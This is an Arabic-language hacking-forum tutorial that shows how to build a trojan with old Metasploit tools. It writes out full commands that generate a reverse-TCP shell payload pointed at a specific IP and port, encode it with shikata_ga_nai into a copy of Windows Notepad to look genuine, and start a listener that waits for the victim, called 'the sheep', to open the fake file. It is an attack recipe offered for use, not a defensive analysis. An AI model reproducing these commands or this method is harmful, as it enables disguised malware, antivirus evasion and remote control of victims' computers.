تحية لكم ياأعضاء منتديات جيوش الهكرز ، اليوم إن شاء الله راح نتناول موضوع جديد ولم يسبق وأن طرح يعني جميع الحقوق محفوظة لمنتديات جيوش الهكرز ....
مثل ماذكرنا لاحقا راح نقوم بتكوين ملف عبارة عن سيرفر وسوف نقوم بتشفيرة ومن ثم تجربة التبليغ ، تم تطبيق النظرية ببرنامج metasploit الإصدار رقم 3-3 لنتابع الشرح من خلال الصور
راح نستخدم أداة cygwin shell المرفقة مع البرنامج ونقوم بالوصول اليها وفتحها كما هو موضح في الصورة التالية:
بعد مانفتح الأداة نكتب الأمر التالي لمعاينة خيارات البايلودات المتاحة :
[hide][/hide]
وسيتم تحديد استخدام البايلود المتاح كما في الصورة التالية :
[hide]
[/hide]
بعد ذلك سنقوم باستعراض الأوامر المساعدة لأمر التشفير من خلال كتابتنا للكود التالي :
وسوف تظهر لنا الأوامر المساعدة كما هو موضوح بالصورة التالية :
من خلال ماسبق سنقوم باستعراض قائمة التشفير المتاحة لإستخدام أفضلها ، ونقوم بكتابة الأمر التالي لعرض القائمة :
وبموجب الأمر السابق سيتم ظهور قائمة بالتشفير سيتم استخدامنا لكود التشفير المحدد برقم 2 كما في الصورة التالية :
الأن حددنا نقطتين سيتم استخادمها وبقي لنا نقطة وهي معرفة خيارات module للأوامر المساعدة للأكسبلويت ، ونقوم باستعراضها من خلال الأمر التالي :
وبموجب ذلك سوف تظهر لنا الأوامر المساعدة لعرض الخيارات كما بالصورة التالية :
سنقوم باستخدام الأمر s مع البايلود الذي حددناه في أول خطوة لعرض الخيارات ويهمنا فيها خيارات التبليغ ، ونطبق ذلك من خلال الأمر التالي :
كود:
msfpayload windows/shell/reverse_tcp s
من خلال الأمر السابق سوف تظهر لنا خيارات كما في الصورة التالية :
حلو الأن عرفنا كافة المعلومات إلي راح نحتاجها وبقي لنا قبل التطبيق ، أن نقوم بتوفير أي برنامج لنحوله إلى سيرفر ، أنا أخترت برنامج المفكرة تبع الويندوز ( notepad ) وسوف نقوم بتوفيرها من خلال نسخها من مجلد windows الموجود بالقرص سي ولصقها داخل مجلد ( black ) في برنامج الميتاسبلويت طبعا اسم المجلد عندي بلاك يعني بحسب المستخدم ، الصور التالية ستوضح لكم الفكرة بشكل ممتاز ، لنتابع
الأن نجي لأمر تطبيق النقاط السابقة بشكل كامل ، بمعنى تحديد بايلود التبليغ وكود التشفير والأي بي تبعنا او الهوست لإستقبال الإتصال بالإضافة إلى تحديد المنفذ ، ويتم كل ذلك من خلال كتابتنا للأمر التالي :
[hide]
كود:
msfpayload windows/shell/reverse_tcp LHOST=89.189.94.49 LPORT=31337 R | msfencode -x NOTEPAD.exe -t exe -e x86/shikata_ga_nai -o reverseNOTEPAD.exe
[/hide]مثل ماتشوفوا حددنا كافة الخيارات بالإضافة إلى صيفة الملف الناتج وهو تنفيذي ، والصورة التالية توضح تنفيذنا للأمر
وحتى نتأكد من أنه تم تنفيذ الأمر نذهب لمجلد المستخدم داخل مجلدات برنامج الميتا في نفس المكان الذي لصقنا فيه المفكرة وفي حالة نجاح الأمر بإذن الله سوف تظهر لنا النتيجة كما بالصورة التالية
مثل ماشفنا العملية نجحت والحمد لله وأصبح لدينا مفكرتين وحدة تبع الوبندوز الأصل والأخرى نحن قمنا بتكوينها ، وفيما يلي صورة توضح المقارنة بين المفكرتين وهي تدل على أن النسخة الذي قمنا بتكوينها مطابقة للنسخة الأصلية ....
ياسلام شغل نظيف جدا ، الأن نقوم وقبل تجريب التبليغ نقوم بكتابة الكود التالي لتشغيل الأكسبلويت :
[hide]
كود:
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=89.189.94.49 LPORT=31337 E
[/hide]إذا كانت خطواتنا صح سوف يظهر لنا قبول التنفيذ كما في الصورة التالية :
[hide][/hide]
ياسلام تم تشغيل الإكسبلويت ، الأن الأكسبلويت بانتظار التبليغ ، وكيف يجي التبليغ ؟؟؟ طبعا يجي اذا قمنا بفتح السيرفر الذي قمنا بتكوينه وهو المفكرة المزورة ، والصورتين التالية توضح ماذا يحدث عند فتح السيرفر ووصول التبليغ وعملية التطبيق
الصورة السابقة توضح تطبيق الأكسبلويت وظهور التبليغ والمنفذ المفتوح ومن ثم ظهور نافذة دوس الخروف وبالتالي امكانية تطبيقنا لكافة اوامر الدوس على جهاز الخروف ..
نسأل الله أن نكون قد وفقنا بشرح الموضوع ، وأذكر بأن جميع الحقوق محفوظة لمنتديات جيوش الهكرز ، وإلى لقاء أخر إن شاء الله في موضوع حصري جديد
ودمتم سالمين